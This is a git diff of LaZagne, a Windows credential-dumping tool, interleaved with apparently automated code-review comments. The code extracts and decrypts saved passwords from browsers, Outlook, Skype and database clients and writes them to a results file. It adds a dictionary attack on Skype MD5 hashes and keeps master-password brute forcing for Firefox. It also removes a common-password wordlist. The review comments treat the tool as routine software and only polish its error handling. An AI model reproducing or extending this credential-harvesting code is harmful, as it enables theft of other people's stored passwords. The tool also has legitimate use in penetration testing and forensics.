@@ -12,18 +15,16 @@ def first_title(self): print '| ! BANG BANG ! |' print '| |' print '|====================================================================|' - print - WConio.textcolor(WConio.LIGHTGREY) + print Style.RESET_ALL # info option for the logging - def title_info(self, title): - WConio.textcolor(WConio.WHITE) - logging.info("------------------- %s passwords -----------------\n" % title) - WConio.textcolor(WConio.LIGHTGREY) + def title(self, title): + print Style.BRIGHT + Fore.WHITE + '------------------- ' + title + ' passwords -----------------\n' + Style.RESET_ALL + + # Subtitle + def title1(self, title1): + print Style.BRIGHT + Fore.WHITE + '[*] ' + title1 + '\n' + Style.RESET_ALL # debug option for the logging - def title_debug(self, title): - WConio.textcolor(WConio.WHITE) - logging.debug("------------------- %s passwords -----------------\n" % title) - WConio.textcolor(WConio.LIGHTGREY) - + def title_info(self, title): + logging.info(Style.BRIGHT + Fore.WHITE + '------------------- ' + title + ' passwords -----------------\n' + Style.RESET_ALL) diff --git a/Windows/src/LaZagne/config/write_output.py b/Windows/src/LaZagne/config/write_output.py index 3d342367..4c692b7e 100644 --- a/Windows/src/LaZagne/config/write_output.py +++ b/Windows/src/LaZagne/config/write_output.py 
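Review bot: The comments kept above the renamed methods in Windows/src/LaZagne/config/header.py no longer describe them: `# info option for the logging` now sits on `title`, which prints unconditionally, and `# debug option for the logging` sits on `title_info`, which logs at INFO. The Linux header.py hunk of this commit already has matching wording that can be reused here: `# print the title if no logging level has been set` for `title` and `# print the title if logging level is higher or equal to info` for `title_info`.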
@@ -1 +1 @@ -from constant import constant from time import gmtime, strftime import os, getpass, socket import logging import WConio from config.header import Header # --------------------------- Functions used to write --------------------------- def write_header(): time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) header = '''|====================================================================|\r\n | |\r\n | Credentsials discovery |\r\n | |\r\n | ! BANG BANG ! |\r\n | |\r\n |====================================================================|\r\n\r\n - Date: ''' + time + '''\n\r - Username: ''' + getpass.getuser() + ''' \r\n - Hostname: ''' + socket.gethostname() + ''' \r\n\r\n ------------------------------ Results ------------------------------\r\n\r\n''' open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(header) def write_footer(): footer = '\n[+] %s passwords have been found.\r\n\r\n' % str(constant.nbPasswordFound) open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(footer) def write_credentials(pwdFound, category): tmp = "############ %s passwords ############\r\n\r\n" % category for pwd in pwdFound: for p in pwd.keys(): tmp = str(tmp) + str(p) + ": " + str(pwd[p]) + "\r\n" tmp = str(tmp) + "\r\n" open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(tmp) def checks_write(values, category): if values: if constant.output == 'txt': try: write_credentials(values, category) logging.info('[+] Credentials stored successfully on the file: %s\\credentials.txt\n' % constant.folder_name) except: logging.info('Couldn\'t write the results file\n') # --------------------------- End of functions used to write --------------------------- # --------------------------- Output functions --------------------------- def print_footer(): footer = '\n[+] %s passwords have been found.\n' % str(constant.nbPasswordFound) if logging.getLogger().isEnabledFor(logging.DEBUG) == False: footer += 'For more information launch it again with the 
-v option\n' logging.info(footer) # print output if passwords have been found def print_output(software_name, pwdFound): if pwdFound: # if the debug logging level is not apply => print the title if logging.getLogger().isEnabledFor(logging.DEBUG) == False: Header().title_info(software_name) toWrite = [] for pwd in pwdFound: lower_list = [s.lower() for s in pwd.keys()] password = [s for s in lower_list if "password" in s] key = [s for s in lower_list if "key" in s] # for the wifi # No password found if not password and not key: print_debug("FAILED", "Password not found !!!") else: print_debug("OK", "Password found !!!") toWrite.append(pwd) # Store all passwords found on a table => for dictionnary attack if masterpassword set constant.nbPasswordFound += 1 try: if password: constant.passwordFound.append(pwd['Password'].strip()) elif key: constant.passwordFound.append(pwd['key']) except: pass for p in pwd.keys(): logging.info("%s: %s" % (p, pwd[p])) print # write credentials into a text file checks_write(toWrite, software_name) else: logging.debug("[!] No passwords found\n") def print_error(message): WConio.textcolor(WConio.LIGHTRED) logging.debug('[!] 
%s\n' % message) WConio.textcolor(WConio.LIGHTGREY) def print_debug(error_level, message): if error_level == 'ERROR': WConio.textcolor(WConio.LIGHTRED) logging.debug('[ERROR] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY) elif error_level == 'INFO': logging.debug('[INFO] %s\n' % message) # print when password is not found elif error_level == 'WARNING': WConio.textcolor(WConio.CYAN) logging.debug('[WARNING] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY) # print when password is not found elif error_level == 'FAILED': WConio.textcolor(WConio.LIGHTRED) logging.info(message) WConio.textcolor(WConio.LIGHTGREY) # print when password is found elif error_level == 'OK': WConio.textcolor(WConio.GREEN) logging.info(message) WConio.textcolor(WConio.LIGHTGREY) elif error_level == 'DEBUG': logging.debug('%s\n' % message) else: logging.debug('[%s] %s' % (error_level, message)) # --------------------------- End of output functions --------------------------- \ No newline at end of file +from constant import constant from time import gmtime, strftime import os, getpass, socket import logging from config.header import Header from colorama import init, Fore, Back, Style init() # init the colorama function # --------------------------- Functions used to write --------------------------- def write_header(): time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) header = '''|====================================================================|\r\n | |\r\n | Credentsials discovery |\r\n | |\r\n | ! BANG BANG ! 
|\r\n | |\r\n |====================================================================|\r\n\r\n - Date: ''' + time + '''\n\r - Username: ''' + getpass.getuser() + ''' \r\n - Hostname: ''' + socket.gethostname() + ''' \r\n\r\n ------------------------------ Results ------------------------------\r\n\r\n''' open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(header) def write_footer(): footer = '\n[+] %s passwords have been found.\r\n\r\n' % str(constant.nbPasswordFound) open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(footer) def write_credentials(pwdFound, category): tmp = "############ %s passwords ############\r\n\r\n" % category for pwd in pwdFound: for p in pwd.keys(): tmp = str(tmp) + str(p) + ": " + str(pwd[p]) + "\r\n" tmp = str(tmp) + "\r\n" open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(tmp) def checks_write(values, category): if values: if constant.output == 'txt': try: write_credentials(values, category) logging.info('[+] Credentials stored successfully on the file: %s\\credentials.txt\n' % constant.folder_name) except: logging.info('Couldn\'t write the results file\n') # --------------------------- End of functions used to write --------------------------- # --------------------------- Output functions --------------------------- def print_footer(): footer = '\n[+] %s passwords have been found.\n' % str(constant.nbPasswordFound) if logging.getLogger().isEnabledFor(logging.INFO) == False: footer += 'For more information launch it again with the -v option\n' logging.info(footer) # print output if passwords have been found def print_output(software_name, pwdFound, title1 = False): if pwdFound: # if the debug logging level is not apply => print the title if logging.getLogger().isEnabledFor(logging.INFO) == False: if not title1: Header().title(software_name) toWrite = [] password_category = False for pwd in pwdFound: # detect which kinds of password has been found lower_list = [s.lower() for s in 
pwd.keys()] password = [s for s in lower_list if "password" in s] if password: password_category = password else: key = [s for s in lower_list if "key" in s] # for the wifi if key: password_category = key else: hash = [s for s in lower_list if "hash" in s] if hash: password_category = hash # No password found if not password_category: print_debug("FAILED", "Password not found !!!") else: print_debug("OK", '%s found !!!' % password_category[0].title()) toWrite.append(pwd) # Store all passwords found on a table => for dictionary attack if master password set constant.nbPasswordFound += 1 try: constant.passwordFound.append(pwd[password_category[0]]) except: pass for p in pwd.keys(): print '%s: %s' % (p, pwd[p]) print # write credentials into a text file checks_write(toWrite, software_name) else: logging.info("[!] No passwords found\n") def print_debug(error_level, message): # print when password is found if error_level == 'OK': print Fore.GREEN + message + Style.RESET_ALL # print when password is not found elif error_level == 'FAILED': print Style.BRIGHT + Fore.RED + message + Style.RESET_ALL # print messages depending of their criticism elif error_level == 'CRITICAL': logging.critical(Style.BRIGHT + Fore.RED + '[CRITICAL] %s\n' % message + Style.RESET_ALL) elif error_level == 'ERROR': logging.error(Style.BRIGHT + Fore.RED + '[ERROR] %s\n' % message + Style.RESET_ALL) elif error_level == 'WARNING': logging.warning(Fore.CYAN + '[WARNING] %s\n' % message + Style.RESET_ALL) elif error_level == 'DEBUG': logging.debug('[DEBUG] %s\n' % message) elif error_level == 'INFO': logging.info('%s\n' % message) else: logging.info('[%s] %s' % (error_level, message)) # --------------------------- End of output functions --------------------------- \ No newline at end of file diff --git a/Windows/src/LaZagne/laZagne.py b/Windows/src/LaZagne/laZagne.py index 7da41d9f..80900f1c 100644 --- a/Windows/src/LaZagne/laZagne.py +++ b/Windows/src/LaZagne/laZagne.py 
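Review bot: In `print_output`, `password_category` is set to `False` once before `for pwd in pwdFound:` and never reset, so after the first entry with a password, key or hash field, every later entry without one still takes the "found" branch. The lookup `pwd[password_category[0]]` also applies a lower-cased name to the original dict, so it raises KeyError for capitalised keys (for example `values['Password']` in the CoreFTP hunk), and the bare `except: pass` hides that. Reset the flag as the first statement of the loop body and keep the original spelling, e.g. `keys = dict((k.lower(), k) for k in pwd.keys())` followed by `pwd[keys[password_category[0]]]`. Indentation is lost on this page, so the loop placement is read from statement order.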
@@ -45,9 +45,9 @@ def output(): def verbosity(): # write on the console + debug file - if args['verbose']==0: level=logging.INFO - elif args['verbose'] >= 1: level=logging.DEBUG - elif args['verbose']>=2: level=logging.WARNING + if args['verbose']==0: level=logging.CRITICAL + elif args['verbose'] == 1: level=logging.INFO + elif args['verbose']>=2: level=logging.DEBUG FORMAT = "%(message)s" formatter = logging.Formatter(fmt=FORMAT) @@ -55,7 +55,9 @@ def verbosity(): stream.setFormatter(formatter) root = logging.getLogger() root.setLevel(level) - root.handlers = [] + # if other logging are set + for r in root.handlers: + r.setLevel(logging.CRITICAL) root.addHandler(stream) del args['verbose'] diff --git a/Windows/src/LaZagne/softwares/browsers/chrome.py b/Windows/src/LaZagne/softwares/browsers/chrome.py index 5dca2030..21cf4f30 100644 --- a/Windows/src/LaZagne/softwares/browsers/chrome.py +++ b/Windows/src/LaZagne/softwares/browsers/chrome.py @@ -14,7 +14,7 @@ def __init__(self): # main function def run(self): # print title - Header().title_debug('Chrome') + Header().title_info('Chrome') database_path = '' if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ: @@ -38,8 +38,13 @@ def run(self): return # Connect to the Database - conn = sqlite3.connect(database_path) - cursor = conn.cursor() + try: + conn = sqlite3.connect(database_path) + cursor = conn.cursor() + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + print_debug('ERROR', 'An error occured opening the database file') + return # Get the results try: diff --git a/Windows/src/LaZagne/softwares/browsers/dico.py b/Windows/src/LaZagne/softwares/browsers/dico.py deleted file mode 100644 index c376d191..00000000 --- a/Windows/src/LaZagne/softwares/browsers/dico.py +++ /dev/null 
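Review bot: Setting the existing root handlers to CRITICAL in the `for r in root.handlers:` loop leaves them attached, so a CRITICAL record is written once by each old handler and again by the new `stream` handler, and every further call to `verbosity()` would add one more `stream`. If the aim is only to silence handlers installed by imported libraries, detaching them with `root.removeHandler(r)` over a copy of the list avoids the duplicates. If they must stay, the comment `# if other logging are set` should say which handlers are expected and why they are kept. `verbosity()` starts and ends outside this hunk.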
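Review bot: `except Exception,e:` in the new handler around `sqlite3.connect` is the Python 2-only spelling; `except Exception as e:` is accepted from Python 2.6 on and is the only form Python 3 parses. The same spelling is introduced in the ie.py, mozilla.py, opera.py, skype.py, outlook.py, coreftp.py, cyberduck.py, puttycm.py and winscp.py hunks of this commit. Where the failing call is known, a narrower class such as `except sqlite3.Error as e:` here would keep unrelated programming errors from being reduced to a DEBUG line. `run()` continues outside the hunk.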
@@ -1,505 +0,0 @@ - -def get_dico(): - return [ - "password", - "123456", - "12345678", - "1234", - "qwerty", - "12345", - "dragon", - "pussy", - "baseball", - "football", - "letmein", - "monkey", - "696969", - "abc123", - "mustang", - "michael", - "shadow", - "master", - "jennifer", - "111111", - "2000", - "jordan", - "superman", - "harley", - "1234567", - "fuckme", - "hunter", - "fuckyou", - "trustno1", - "ranger", - "buster", - "thomas", - "tigger", - "robert", - "soccer", - "fuck", - "batman", - "test", - "pass", - "killer", - "hockey", - "george", - "charlie", - "andrew", - "michelle", - "love", - "sunshine", - "jessica", - "asshole", - "6969", - "pepper", - "daniel", - "access", - "123456789", - "654321", - "joshua", - "maggie", - "starwars", - "silver", - "william", - "dallas", - "yankees", - "123123", - "ashley", - "666666", - "hello", - "amanda", - "orange", - "biteme", - "freedom", - "computer", - "sexy", - "thunder", - "nicole", - "ginger", - "heather", - "hammer", - "summer", - "corvette", - "taylor", - "fucker", - "austin", - "1111", - "merlin", - "matthew", - "121212", - "golfer", - "cheese", - "princess", - "martin", - "chelsea", - "patrick", - "richard", - "diamond", - "yellow", - "bigdog", - "secret", - "asdfgh", - "sparky", - "cowboy", - "camaro", - "anthony", - "matrix", - "falcon", - "iloveyou", - "bailey", - "guitar", - "jackson", - "purple", - "scooter", - "phoenix", - "aaaaaa", - "morgan", - "tigers", - "porsche", - "mickey", - "maverick", - "cookie", - "nascar", - "peanut", - "justin", - "131313", - "money", - "horny", - "samantha", - "panties", - "steelers", - "joseph", - "snoopy", - "boomer", - "whatever", - "iceman", - "smokey", - "gateway", - "dakota", - "cowboys", - "eagles", - "chicken", - "dick", - "black", - "zxcvbn", - "please", - "andrea", - "ferrari", - "knight", - "hardcore", - "melissa", - "compaq", - "coffee", - "booboo", - "bitch", - "johnny", - "bulldog", - "xxxxxx", - "welcome", - "james", - "player", - "ncc1701", - 
"wizard", - "scooby", - "charles", - "junior", - "internet", - "bigdick", - "mike", - "brandy", - "tennis", - "blowjob", - "banana", - "monster", - "spider", - "lakers", - "miller", - "rabbit", - "enter", - "mercedes", - "brandon", - "steven", - "fender", - "john", - "yamaha", - "diablo", - "chris", - "boston", - "tiger", - "marine", - "chicago", - "rangers", - "gandalf", - "winter", - "bigtits", - "barney", - "edward", - "raiders", - "porn", - "badboy", - "blowme", - "spanky", - "bigdaddy", - "johnson", - "chester", - "london", - "midnight", - "blue", - "fishing", - "000000", - "hannah", - "slayer", - "11111111", - "rachel", - "sexsex", - "redsox", - "thx1138", - "asdf", - "marlboro", - "panther", - "zxcvbnm", - "arsenal", - "oliver", - "qazwsx", - "mother", - "victoria", - "7777777", - "jasper", - "angel", - "david", - "winner", - "crystal", - "golden", - "butthead", - "viking", - "jack", - "iwantu", - "shannon", - "murphy", - "angels", - "prince", - "cameron", - "girls", - "madison", - "wilson", - "carlos", - "hooters", - "willie", - "startrek", - "captain", - "maddog", - "jasmine", - "butter", - "booger", - "angela", - "golf", - "lauren", - "rocket", - "tiffany", - "theman", - "dennis", - "liverpoo", - "flower", - "forever", - "green", - "jackie", - "muffin", - "turtle", - "sophie", - "danielle", - "redskins", - "toyota", - "jason", - "sierra", - "winston", - "debbie", - "giants", - "packers", - "newyork", - "jeremy", - "casper", - "bubba", - "112233", - "sandra", - "lovers", - "mountain", - "united", - "cooper", - "driver", - "tucker", - "helpme", - "fucking", - "pookie", - "lucky", - "maxwell", - "8675309", - "bear", - "suckit", - "gators", - "5150", - "222222", - "shithead", - "fuckoff", - "jaguar", - "monica", - "fred", - "happy", - "hotdog", - "tits", - "gemini", - "lover", - "xxxxxxxx", - "777777", - "canada", - "nathan", - "victor", - "florida", - "88888888", - "nicholas", - "rosebud", - "metallic", - "doctor", - "trouble", - "success", - "stupid", - 
"tomcat", - "warrior", - "peaches", - "apples", - "fish", - "qwertyui", - "magic", - "buddy", - "dolphins", - "rainbow", - "gunner", - "987654", - "freddy", - "alexis", - "braves", - "cock", - "2112", - "1212", - "cocacola", - "xavier", - "dolphin", - "testing", - "bond007", - "member", - "calvin", - "voodoo", - "7777", - "samson", - "alex", - "apollo", - "fire", - "tester", - "walter", - "beavis", - "voyager", - "peter", - "porno", - "bonnie", - "rush2112", - "beer", - "apple", - "scorpio", - "jonathan", - "skippy", - "sydney", - "scott", - "red123", - "power", - "gordon", - "travis", - "beaver", - "star", - "jackass", - "flyers", - "boobs", - "232323", - "zzzzzz", - "steve", - "rebecca", - "scorpion", - "doggie", - "legend", - "ou812", - "yankee", - "blazer", - "bill", - "runner", - "birdie", - "bitches", - "555555", - "parker", - "topgun", - "asdfasdf", - "heaven", - "viper", - "animal", - "2222", - "bigboy", - "4444", - "arthur", - "baby", - "private", - "godzilla", - "donald", - "williams", - "lifehack", - "phantom", - "dave", - "rock", - "august", - "sammy", - "cool", - "brian", - "platinum", - "jake", - "bronco", - "paul", - "mark", - "frank", - "heka6w2", - "copper", - "billy", - "cumshot", - "garfield", - "willow", - "cunt", - "little", - "carter", - "slut", - "albert", - "69696969", - "kitten", - "super", - "jordan23", - "eagle1", - "shelby", - "america", - "11111", - "jessie", - "house", - "free", - "123321", - "chevy", - "bullshit", - "white", - "broncos", - "horney", - "surfer", - "nissan", - "999999", - "saturn", - "airborne", - "elephant", - "marvin", - "shit", - "action", - "adidas", - "qwert", - "kevin", - "1313", - "explorer", - "walker", - "police", - "christin", - "december", - "benjamin", - "wolf", - "sweet", - "therock", - "king", - "online", - "dickhead", - "brooklyn", - "teresa", - "cricket", - "sharon", - "dexter", - "racing", - "penis", - "gregory", - "0000", - "teens", - "redwings", - "dreams", - "michigan", - "hentai", - "magnum", - 
"87654321", - "nothing", - "donkey", - "trinity", - "digital", - "333333", - "stella", - "cartman", - "guinness", - "123abc", - "speedy", - "buffalo", - "kitty"] - diff --git a/Windows/src/LaZagne/softwares/browsers/ie.py b/Windows/src/LaZagne/softwares/browsers/ie.py index 6f6a6d14..3c6fb976 100644 --- a/Windows/src/LaZagne/softwares/browsers/ie.py +++ b/Windows/src/LaZagne/softwares/browsers/ie.py @@ -58,8 +58,8 @@ def get_hash_table(self, list): try: h = (urls[u] + '\0').encode('UTF-16LE') hash_tables.append([h, hashlib.sha1(h).hexdigest().lower()]) - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return hash_tables def write_binary_file(self): @@ -211,8 +211,8 @@ def get_history(self): urls.append(r) else: break - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) # Unload the dll to delete it later handle = lib._handle # obtain the DLL handle @@ -221,9 +221,9 @@ def get_history(self): # delete the dll os.remove(dll_name) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Browser history failed to load, only few url will be tried') - pass urls.append('https://www.facebook.com/') urls.append('https://www.gmail.com/') @@ -241,7 +241,8 @@ def history_from_regedit(self): try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return [] num = win32api.RegQueryInfoKey(hkey)[1] @@ -249,7 +250,6 @@ def history_from_regedit(self): k = win32api.RegEnumValue(hkey, x) if k: urls.append(k[1]) - return urls def decipher_password(self, cipher_text, u): @@ -261,9 +261,9 @@ def decipher_password(self, cipher_text, u): a = pwd[i:].decode('UTF-16LE') a = a.decode('utf-8') break - except: - result = '' + except Exception,e: pass + result = '' # the last one is always equal to 0 secret = a.split('\x00') 
@@ -288,17 +288,18 @@ def decipher_password(self, cipher_text, u): pwdFound.append(values) else: password = secret[length - s] - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) def run(self, historic=''): # print title - Header().title_debug('Internet Explorer') + Header().title_info('Internet Explorer') # write the binary file try: self.write_binary_file() - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name) list = [] @@ -320,7 +321,8 @@ def run(self, historic=''): failed = False try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) failed = True nb_site = 0 diff --git a/Windows/src/LaZagne/softwares/browsers/mozilla.py b/Windows/src/LaZagne/softwares/browsers/mozilla.py index 5643458b..e8495aeb 100644 --- a/Windows/src/LaZagne/softwares/browsers/mozilla.py +++ b/Windows/src/LaZagne/softwares/browsers/mozilla.py @@ -9,7 +9,7 @@ import sqlite3 import json import shutil -from dico import get_dico +from config.dico import get_dico import itertools from config.header import Header from config.constant import * @@ -156,8 +156,8 @@ def initialize_libnss(self, list_libnss, profile): self.libnss = CDLL(lib) if self.libnss.NSS_Init(profile) == 0: return True - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False def found_libnss(self): @@ -232,7 +232,8 @@ def save_db(self, userpath): dst_db = relative_path + os.sep + dbname shutil.copyfile(ori_db, dst_db) print_debug('INFO', '%s has been copied here: %s' % (dbname, dst_db)) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s has not been copied' % dbname) try: 
@@ -241,7 +242,8 @@ def save_db(self, userpath): dst_db = relative_path + os.sep + dbname shutil.copyfile(ori_db, dst_db) print_debug('INFO', '%s has been copied here: %s' % (dbname, dst_db)) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s has not been copied' % dbname) # ------------------------------ Master Password Functions ------------------------------ @@ -283,7 +285,8 @@ def found_masterpassword(self): try: pass_file = open(self.dictionnary_path, 'r') num_lines = sum(1 for line in pass_file) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Unable to open passwords file: %s' % str(self.dictionnary_path)) return 1 pass_file.close() @@ -299,7 +302,8 @@ def found_masterpassword(self): except (KeyboardInterrupt, SystemExit): print 'INTERRUPTED!' print_debug('DEBUG', 'Dictionnary attack interrupted') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) pass print_debug('WARNING', 'The Master password has not been found using the dictionnary attack') @@ -335,8 +339,8 @@ def found_masterpassword(self): except (KeyboardInterrupt, SystemExit): print 'INTERRUPTED!' print_debug('INFO', 'Dictionnary attack interrupted') - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('WARNING', 'No password has been found using the brute force attack') # ------------------------------ End of Master Password Functions ------------------------------ @@ -358,7 +362,7 @@ def run(self): return # print the title - Header().title_debug(software_name) + Header().title_info(software_name) list_libnss = self.found_libnss() 
@@ -390,13 +394,15 @@ def run(self): # check if passwors are stored on the Json format try: credentials = JsonDatabase(profile) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) database_find = False if not database_find: # check if passwors are stored on the sqlite format try: credentials = SqliteDatabase(profile) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) database_find = False if database_find: @@ -409,15 +415,14 @@ def run(self): try: # decrypt passwords on the db pwdFound+=self.decrypt(software_name, credentials) - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) # if a master password is set (but not found), we save the db to bruteforce offline elif masterPwd and not masterPwdFound and constant.output == 'txt': self.save_db(profile) self.libnss.NSS_Shutdown() - else: print_debug('ERROR', 'Could not initialize the NSS library\n') diff --git a/Windows/src/LaZagne/softwares/browsers/opera.py b/Windows/src/LaZagne/softwares/browsers/opera.py index 657128d7..ad3f218e 100644 --- a/Windows/src/LaZagne/softwares/browsers/opera.py +++ b/Windows/src/LaZagne/softwares/browsers/opera.py @@ -16,7 +16,7 @@ def __init__(self): def run(self): # print title - Header().title_debug('Opera') + Header().title_info('Opera') # retrieve opera folder path = self.get_path() @@ -134,7 +134,8 @@ def decipher_new_version(self, path): # Get the results try: cursor.execute('SELECT action_url, username_value, password_value FROM logins') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !') return 
@@ -166,12 +167,14 @@ def masterPasswordUsed(self, path): try: cp.readfp(f) break - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) f.readline() # discard first line try: master_pass = cp.get('Security Prefs','Use Paranoid Mailpassword') return master_pass - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return False diff --git a/Windows/src/LaZagne/softwares/chats/jitsi.py b/Windows/src/LaZagne/softwares/chats/jitsi.py index 06348d8f..06fb83c4 100644 --- a/Windows/src/LaZagne/softwares/chats/jitsi.py +++ b/Windows/src/LaZagne/softwares/chats/jitsi.py @@ -102,7 +102,7 @@ def decrypt_password(self, encrypted_pass): # main function def run(self): # print title - Header().title_debug('Jitsi') + Header().title_info('Jitsi') file_properties = self.get_path() if file_properties == 'Error': diff --git a/Windows/src/LaZagne/softwares/chats/pidgin.py b/Windows/src/LaZagne/softwares/chats/pidgin.py index 5b9af8ed..67014802 100644 --- a/Windows/src/LaZagne/softwares/chats/pidgin.py +++ b/Windows/src/LaZagne/softwares/chats/pidgin.py @@ -12,7 +12,7 @@ def __init__(self): def run(self): # print title - Header().title_debug('Pidgin') + Header().title_info('Pidgin') if 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\.purple' diff --git a/Windows/src/LaZagne/softwares/chats/skype.py b/Windows/src/LaZagne/softwares/chats/skype.py index 06e81773..5a5e4ed3 100644 --- a/Windows/src/LaZagne/softwares/chats/skype.py +++ b/Windows/src/LaZagne/softwares/chats/skype.py @@ -7,6 +7,7 @@ from config.write_output import print_output, print_debug from config.header import Header from config.moduleInfo import ModuleInfo +from config.dico import get_dico class Skype(ModuleInfo): def __init__(self): 
@@ -26,7 +27,8 @@ def get_regkey(self): try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return '' num = win32api.RegQueryInfoKey(hkey)[1] @@ -35,7 +37,8 @@ def get_regkey(self): if k: key = k[1] return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) return 'failed' # get hash from configuration file @@ -71,11 +74,19 @@ def get_md5_hash(self, enc_hex, key): # byte to hex return binascii.hexlify(tmp) - + + def dictionary_attack(self, login, md5): + wordlist = get_dico() + for word in wordlist: + hash = hashlib.md5('%s\nskyper\n%s' % (login, word)).hexdigest() + if hash == md5: + return word + return False + # main function def run(self): # print title - Header().title_debug('Skype') + Header().title_info('Skype') if 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\Skype' @@ -92,7 +103,7 @@ def run(self): values = {} try: - values['Username'] = d + values['username'] = d # get encrypted hash from the config file enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + 'config.xml') @@ -101,12 +112,17 @@ def run(self): print_debug('WARNING', 'No credential stored on the config.xml file.') else: # decrypt the hash to get the md5 to brue force - values['Hash_md5'] = self.get_md5_hash(enc_hex, key) - values['shema to bruteforce'] = values['Username'] + '\\nskyper\\n' + values['hash_md5'] = self.get_md5_hash(enc_hex, key) + values['shema to bruteforce'] = values['username'] + '\\nskyper\\n' + # Try a dictionary attack on the hash + password = self.dictionary_attack(values['username'], values['hash_md5']) + if password: + values['password'] = password + pwdFound.append(values) - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) # print the results print_output("Skype", pwdFound) else: 
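Review bot: In the new `dictionary_attack` method the local `hash` shadows the builtin of the same name, and the method returns either a string or `False`, which the caller can only tell apart by truthiness. Naming the local `digest` and ending with `return None` reads more clearly (`print_output` in write_output.py uses `hash` as a local in the same way). A one-line docstring stating that the method returns the matching wordlist entry, or None when nothing matches, would document the contract that `run()` relies on in `if password:`.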
diff --git a/Windows/src/LaZagne/softwares/databases/dbvis.py b/Windows/src/LaZagne/softwares/databases/dbvis.py index e274c307..12ceb2e4 100644 --- a/Windows/src/LaZagne/softwares/databases/dbvis.py +++ b/Windows/src/LaZagne/softwares/databases/dbvis.py @@ -111,7 +111,7 @@ def get_mainPath(self): def run(self): # print title - Header().title_debug('Dbvisualizer') + Header().title_info('Dbvisualizer') mainPath = self.get_mainPath() diff --git a/Windows/src/LaZagne/softwares/databases/sqldeveloper.py b/Windows/src/LaZagne/softwares/databases/sqldeveloper.py index c12ebe1c..39b75348 100644 --- a/Windows/src/LaZagne/softwares/databases/sqldeveloper.py +++ b/Windows/src/LaZagne/softwares/databases/sqldeveloper.py @@ -127,7 +127,7 @@ def get_infos(self, path, passphrase, salt): def run(self): # print title - Header().title_debug('SQL Developer') + Header().title_info('SQL Developer') mainPath = self.get_mainPath() if mainPath == 'Error': diff --git a/Windows/src/LaZagne/softwares/databases/squirrel.py b/Windows/src/LaZagne/softwares/databases/squirrel.py index 31bf6f02..292aaf81 100644 --- a/Windows/src/LaZagne/softwares/databases/squirrel.py +++ b/Windows/src/LaZagne/softwares/databases/squirrel.py @@ -47,7 +47,7 @@ def parse_xml(self, xml_file): # Main function def run(self): # print title - Header().title_debug('Squirrel') + Header().title_info('Squirrel') path = self.get_path() if path == 'Not_Found': diff --git a/Windows/src/LaZagne/softwares/mails/outlook.py b/Windows/src/LaZagne/softwares/mails/outlook.py index a82a9002..b62aa405 100644 --- a/Windows/src/LaZagne/softwares/mails/outlook.py +++ b/Windows/src/LaZagne/softwares/mails/outlook.py 
@@ -11,14 +11,15 @@ def __init__(self): def run(self): # print title - Header().title_debug('Outlook') + Header().title_info('Outlook') accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook' try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath) return @@ -45,7 +46,6 @@ def run(self): # print the results print_output("Outlook", pwdFound) - def retrieve_info(self, hkey, name_key): values = {} num = win32api.RegQueryInfoKey(hkey)[1] @@ -55,15 +55,14 @@ def retrieve_info(self, hkey, name_key): try: password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1] values[k[0]] = password.decode('utf16') - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) values[k[0]] = 'N/A' - pass else: try: values[k[0]] = str(k[1]).decode('utf16') except: values[k[0]] = str(k[1]) - print values return values diff --git 